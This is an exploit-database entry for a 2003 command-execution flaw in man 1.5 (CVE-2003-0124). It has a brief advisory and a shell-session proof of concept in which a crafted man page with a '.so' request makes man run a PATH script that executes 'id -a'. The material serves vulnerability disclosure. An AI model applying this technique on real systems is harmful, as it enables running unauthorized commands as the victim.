[] NeoSense
E X P L O I T S
title author type platform port cve id

Man Program 1.5 - Unsafe Return Value Command Execution

Author: Jack Lloyd
type: local
platform: linux
port: 
date_added: 2003-03-11 
date_updated: 2012-10-30 
verified: 1 
codes: CVE-2003-0124;OSVDB-8806 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/7066/info

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.